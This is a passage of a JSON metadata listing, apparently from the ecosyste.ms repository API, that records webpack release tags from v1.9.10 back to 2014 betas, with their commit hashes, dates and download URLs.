9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-be